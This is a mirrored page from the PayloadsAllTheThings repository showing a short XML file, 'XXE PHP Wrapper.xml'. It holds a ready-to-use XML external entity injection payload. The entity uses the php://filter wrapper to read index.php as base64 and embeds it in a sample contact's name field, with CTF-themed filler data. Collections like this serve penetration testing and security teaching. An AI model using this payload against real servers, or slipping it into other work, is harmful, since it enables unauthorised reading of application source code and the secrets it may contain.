1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-24 23:50:43 +02:00
PayloadsAllTheThings/XXE Injection/Files/XXE PHP Wrapper.xml

11 lines
305 B
XML
Raw Normal View History

2017-08-07 21:42:14 +02:00
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
<phone>00 11 22 33 44</phone>
<address>42 rue du CTF</address>
2017-08-07 21:42:14 +02:00
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
</contacts>